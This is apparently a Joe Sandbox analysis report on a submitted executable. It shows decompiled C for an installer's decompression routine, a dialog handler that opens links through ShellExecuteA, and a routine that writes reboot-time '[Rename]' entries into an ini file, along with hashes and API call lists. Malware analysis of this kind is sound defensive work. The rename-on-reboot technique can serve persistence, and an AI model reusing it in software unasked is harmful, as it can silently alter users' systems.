0x00406998
0x004069a3
0x004069a5
0x004069a8
0x004069e3
0x004069e3
0x00000000
0x004069aa
0x004069aa
0x004069aa
0x004069b0
0x004069b3
0x004069b5
0x004069ea
0x004069ec
0x00000000
0x004069ec
0x00000000
0x004069b5
0x00000000
0x00405ff4
0x004069c2
0x00000000
0x004069c2
0x004063d6
0x004063d8
0x00000000
0x00000000
0x004063da
0x004063da
0x004063dd
0x00000000
0x004063dd
0x00406322
0x004062e3
0x004069c7
0x004069ca
0x004069cc
0x004069d5
0x004069db
0x00000000

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fc2fbc5f6b99236c8936bb3f40f7556cf5b2ae230672f798b05916fdef3cfd4
Instruction ID: 56cab3a0066612c98e3784cfed28ffc4187101fd674252aedfa605d01fc3a8fa
Opcode Fuzzy Hash: 4fc2fbc5f6b99236c8936bb3f40f7556cf5b2ae230672f798b05916fdef3cfd4
Instruction Fuzzy Hash: FEE17AB1900709DFDB24CF98C880BAABBF5EB45305F15852EE897A76D1D338AA51CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00406A9A Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00406A9A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42ce38 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42ce38;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42ce38 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00406aa5
0x00406aad
0x00406ab1
0x00406ab3
0x00406ab6
0x00406ab8
0x00406ab8
0x00406aba
0x00406ac1
0x00406ac3
0x00406ac3
0x00406ac9
0x00406ade
0x00406ae6
0x00406ae8
0x00406aea
0x00406aed
0x00406aee
0x00406aee
0x00406af4
0x00000000
0x00000000
0x00406af6
0x00406af9
0x00000000
0x00000000
0x00000000
0x00406af9
0x00406afd
0x00406b00
0x00406b02
0x00406b02
0x00406b05
0x00406b0b
0x00406b0c
0x00000000
0x00000000
0x00000000
0x00406b0c
0x00406b11
0x00406b14
0x00406b16
0x00406b16
0x00406b1c
0x00406b1e
0x00406b2f
0x00406b22
0x00406b26
0x00406dcb
0x00000000
0x00406dcb
0x00406b2c
0x00406b2d
0x00406b2d
0x00406b35
0x00406b38
0x00406b3c
0x00406b3e
0x00406b40
0x00406b43
0x00000000
0x00000000
0x00406b4b
0x00406b51
0x00406b53
0x00406b55
0x00406b56
0x00406b6b
0x00406b6b
0x00406b6e
0x00406b70
0x00406b70
0x00406b72
0x00406b77
0x00406b79
0x00406b80
0x00406b82
0x00406b8a
0x00406b8a
0x00406b8c
0x00406b8d
0x00406b9c
0x00406ba0
0x00406ba4
0x00406ba7
0x00406baa
0x00406baf
0x00406bb2
0x00406bb8
0x00406bbf
0x00406bc5
0x00406dbe
0x00406dbe
0x00406dc3
0x00406dd2
0x00000000
0x00000000
0x00000000
0x00406dc3
0x00406bd2
0x00406bd5
0x00406bd8
0x00406bdb
0x00406bdf
0x00000000
0x00000000
0x00406bea
0x00406bed
0x00406bee
0x00406bf0
0x00406bf6
0x00406bf9
0x00000000
0x00000000
0x00406bff
0x00406c00
0x00406c03
0x00406c06
0x00406c09
0x00406c0f
0x00406c11
0x00406c11
0x00406c19
0x00406c1d
0x00406c22
0x00406c47
0x00406c4d
0x00406c4f
0x00406c51
0x00406c54
0x00406c5d
0x00000000
0x00000000
0x00406c24
0x00406c24
0x00406c2d
0x00406c31
0x00000000
0x00000000
0x00406c42
0x00406c42
0x00406c45
0x00000000
0x00000000
0x00406c35
0x00406c38
0x00406c3a
0x00406c3e
0x00000000
0x00000000
0x00406c40
0x00406c40
0x00000000
0x00406c42
0x00406c66
0x00406c6c
0x00406c76
0x00406c78
0x00406c7d
0x00406c7f
0x00406cb5
0x00406c81
0x00406c81
0x00406c84
0x00406c87
0x00406c91
0x00406c94
0x00406c9b
0x00406ca6
0x00406cad
0x00406cad
0x00406cb7
0x00406cba
0x00406cbc
0x00406cc2
0x00406cc2
0x00406ccb
0x00406cce
0x00406cd3
0x00406ce2
0x00406cea
0x00406cef
0x00406d13
0x00406d1b
0x00406d1f
0x00406d25
0x00406cf1
0x00406cff
0x00406d02
0x00406d08
0x00406d08
0x00406d29
0x00406ce4
0x00406ce4
0x00406ce4
0x00406d3a
0x00406d3e
0x00406d4a
0x00406d45
0x00406d48
0x00406d48
0x00406d52
0x00406d57
0x00406d5f
0x00406d5b
0x00406d5d
0x00406d5d
0x00406d65
0x00406d67
0x00406d6e
0x00406d78
0x00406d82
0x00406d9e
0x00406da2
0x00406be7
0x00406bed
0x00406bee
0x00406bf0
0x00406bf6
0x00406bf9
0x00000000
0x00000000
0x00000000
0x00406bf9
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d84
0x00406d84
0x00406d84
0x00406d89
0x00406d92
0x00406d9b
0x00000000
0x00406d9b
0x00406da8
0x00406da8
0x00406dab
0x00406db2
0x00406db5
0x00000000
0x00406bd8
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5e
0x00406b61
0x00406b62
0x00406b62
0x00000000
0x00406b5a
0x00406ace
0x00406ad4
0x00000000

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58af5f5ecf814c7bfbd6a218695ae9f924359dc2dc729b1f607b39268f316727
Instruction ID: 2cd64b44fdb598fc6d7be2f0130c20f4249908d1a9472bfe36cd3babe412fd90
Opcode Fuzzy Hash: 58af5f5ecf814c7bfbd6a218695ae9f924359dc2dc729b1f607b39268f316727
Instruction Fuzzy Hash: F7C15C71A00219CBDF14CF64C4905EDB7B2FF99314F26826AD856BB384D734A952CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00403FF1 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403FF1(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x428fec =  *0x428fec + 1;
								__eflags =  *0x428fec;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F0F(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x42db40;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42eba8, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42eba8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x428fec; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x4297f8 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E00403ECA(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E0040427B();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x42e37c; // 0x6541a7
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_t71 =  *0x42ebd8; // 0x653308
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 + _t71;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E00403FBC;
					E00403EA8(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E00403EA8(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E00403ECA( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E00403EDD(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t85 =  *0x42ebb0; // 0x651b28
					_t86 =  *(_t85 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x428fec = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x428fec = 0;
					return 0;
				}
			}

0x00404001
0x00404113
0x00404126
0x00404182
0x00404182
0x00404186
0x00404256
0x0040425d
0x0040425f
0x0040425f
0x0040425f
0x00404265
0x00404265
0x00404268
0x00000000
0x0040426f
0x00404194
0x00404196
0x00404199
0x004041a0
0x004041a2
0x004041a9
0x004041ab
0x004041ae
0x004041b1
0x004041b6
0x004041bc
0x004041bf
0x004041c6
0x004041d4
0x004041ec
0x004041ff
0x0040420f
0x00404211
0x00404211
0x004041c6
0x004041a9
0x00404214
0x0040421b
0x00000000
0x0040421d
0x0040421d
0x00404224
0x00000000
0x00000000
0x00404226
0x0040422a
0x0040423b
0x0040423b
0x0040423d
0x00404241
0x0040424f
0x0040424f
0x00000000
0x00404253
0x0040421b
0x0040412e
0x00404131
0x00000000
0x00000000
0x00404139
0x0040413f
0x00000000
0x00000000
0x0040414b
0x0040414e
0x00404151
0x00000000
0x00000000
0x00404174
0x00404174
0x00404176
0x00404178
0x0040417d
0x00000000
0x00404007
0x00404007
0x0040400a
0x0040400f
0x00404011
0x00404020
0x00404020
0x00404022
0x00404027
0x0040402a
0x0040402c
0x00404031
0x0040403a
0x00404040
0x0040404c
0x0040404f
0x00404058
0x0040405d
0x00404060
0x00404065
0x0040407c
0x00404083
0x00404096
0x00404099
0x004040ae
0x004040b0
0x004040b5
0x004040ba
0x004040bf
0x004040bf
0x004040ce
0x004040dd
0x004040ef
0x004040f4
0x00404104
0x00404106
0x00000000
0x0040410c

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040407C
GetDlgItem.USER32(00000000,000003E8), ref: 00404090
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004040AE
GetSysColor.USER32(?), ref: 004040BF
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040CE
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040DD
lstrlenA.KERNEL32(?), ref: 004040E0
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040EF
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404104
GetDlgItem.USER32(?,0000040A), ref: 00404166
SendMessageA.USER32(00000000), ref: 00404169
GetDlgItem.USER32(?,000003E8), ref: 00404194
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041D4
LoadCursorA.USER32(00000000,00007F02), ref: 004041E3
SetCursor.USER32(00000000), ref: 004041EC
ShellExecuteA.SHELL32(0000070B,open,0042DB40,00000000,00000000,00000001), ref: 004041FF
LoadCursorA.USER32(00000000,00007F00), ref: 0040420C
SetCursor.USER32(00000000), ref: 0040420F
SendMessageA.USER32(00000111,00000001,00000000), ref: 0040423B
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040424F

Strings

Call, xrefs: 004041BF
open, xrefs: 004041F7
N, xrefs: 00404182

Memory Dump Source

Source File: 00000000.00000002.2934479854.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2934447366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934534772.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934571208.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2934897809.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SC.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N$open
API String ID: 3615053054-2563687911
Opcode ID: 51a361e6dc41c16568c55e04c1d01dbf2954b7e404280b64648fd5416c1df2c8
Instruction ID: cd5527be7b01cdd750bd7826aa0acaeb768eecc7c59dcf5154f0932c76b133a4
Opcode Fuzzy Hash: 51a361e6dc41c16568c55e04c1d01dbf2954b7e404280b64648fd5416c1df2c8
Instruction Fuzzy Hash: A961AFB1A40209BFEF109F61CC45F6A7B69FB84741F10417AFB05BA2D1C7B8A951CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004058BE Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 141
filestringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058BE() {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				long _t16;
				intOrPtr _t18;
				long _t29;
				char* _t37;
				int _t43;
				void* _t44;
				intOrPtr* _t45;
				long _t48;
				CHAR* _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t58;
				void* _t59;

				lstrcpyA(0x42bdb0, "NUL");
				_t50 =  *(_t58 + 0x1c);
				if(_t50 == 0) {
					L3:
					_t16 = GetShortPathNameA( *(_t58 + 0x20), 0x42c1b0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b9b0, "%s=%s\r\n", 0x42bdb0, 0x42c1b0);
						_t18 =  *0x42ebb0; // 0x651b28
						_t59 = _t58 + 0x10;
						E00405BBA(_t43, 0x42bdb0, 0x42c1b0, 0x42c1b0,  *((intOrPtr*)(_t18 + 0x128)));
						_t16 = E00405846(0x42c1b0, 0xc0000000, 4);
						_t54 = _t16;
						 *(_t59 + 0x1c) = _t54;
						if(_t54 != 0xffffffff) {
							_t48 = GetFileSize(_t54, 0);
							_t6 = _t43 + 0xa; // 0xa
							_t52 = GlobalAlloc(0x40, _t48 + _t6);
							if(_t52 == 0 || ReadFile(_t54, _t52, _t48, _t59 + 0x10, 0) == 0 || _t48 !=  *(_t59 + 0x10)) {
								L19:
								return CloseHandle(_t54);
							} else {
								if(E004057AB(_t44, _t52, "[Rename]\r\n") != 0) {
									_t55 = E004057AB(_t44, _t26 + 0xa, 0x40936c);
									if(_t55 == 0) {
										_t54 =  *(_t59 + 0x1c);
										L17:
										_t29 = _t48;
										L18:
										E00405801(_t52 + _t29, 0x42b9b0, _t43);
										SetFilePointer(_t54, 0, 0, 0);
										WriteFile(_t54, _t52, _t48 + _t43, _t59 + 0x10, 0);
										GlobalFree(_t52);
										goto L19;
									}
									_t45 = _t52 + _t48;
									_t37 = _t45 + _t43;
									while(_t45 > _t55) {
										 *_t37 =  *_t45;
										_t37 = _t37 - 1;
										_t45 = _t45 - 1;
									}
									_t29 = _t55 - _t52 + 1;
									_t54 =  *(_t59 + 0x1c);
									goto L18;
								}
								lstrcpyA(_t52 + _t48, "[Rename]\r\n");
								_t48 = _t48 + 0xa;
								goto L17;
							}
						}
					}
				} else {
					CloseHandle(E00405846(_t50, 0, 1));
					_t16 = GetShortPathNameA(_t50, 0x42bdb0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L3;
					}
				}
				return _t16;
			}

0x004058ce
0x004058d4
0x004058e5
0x0040590d
0x00405918
0x0040591c
0x0040593c
0x0040593e
0x00405943
0x0040594d
0x0040595a
0x0040595f
0x00405964
0x00405968
0x00405977
0x00405979
0x00405986
0x0040598a
0x00405a3f
0x00000000
0x004059b2
0x004059bf
0x004059e3
0x004059e7
0x00405a06
0x00405a0a
0x00405a0a
0x00405a0c
0x00405a15
0x00405a20
0x00405a32
0x00405a39
0x00000000
0x00405a39
0x004059e9
0x004059ec
0x004059f7
0x004059f3
0x004059f5
0x004059f6
0x004059f6
0x004059fe
0x00405a00
0x00000000
0x00405a00
0x004059ca
0x004059d0
0x00000000
0x004059d0
0x0040598a
0x00405968
0x004058e7
0x004058f2
0x004058fb
0x004058ff
0x00000000
0x00000000
0x004058ff
0x00405a4b

APIs

lstrcpyA.KERNEL32(0042BDB0,NUL,?,00000000,?,00000000,?,00405A74,?,?,00000001,00405634,?,00000000,000000F1,?), ref: 004058CE
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A74,?,?,00000001,00405634,?,00000000,000000F1,?), ref: 004058F2
GetShortPathNameA.KERNEL32(00000000,0042BDB0,00000400), ref: 004058FB

Part of subcall function 004057AB: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,004059BD,00000000,[Rename]), ref: 004057BB
Part of subcall function 004057AB: lstrlenA.KERNEL32(?,?,00000000,004059BD,00000000,[Rename]), ref: 004057ED

GetShortPathNameA.KERNEL32(?,0042C1B0,00000400), ref: 00405918
wsprintfA.USER32 ref: 00405936
GetFileSize.KERNEL32(00000000,00000000,0042C1B0,C0000000,00000004,0042C1B0,?,?,?,?,?), ref: 00405971
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405980
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040599A
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004059CA
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0042B9B0,00000000,-0000000A,0040936C,00000000,[Rename]), ref: 00405A20
WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405A32
GlobalFree.KERNEL32(00000000), ref: 00405A39
CloseHandle.KERNEL32(00000000), ref: 00405A40

Part of subcall function 00405846: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 0040584A
Part of subcall function 00405846: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040586C

Strings

NUL, xrefs: 004058C8
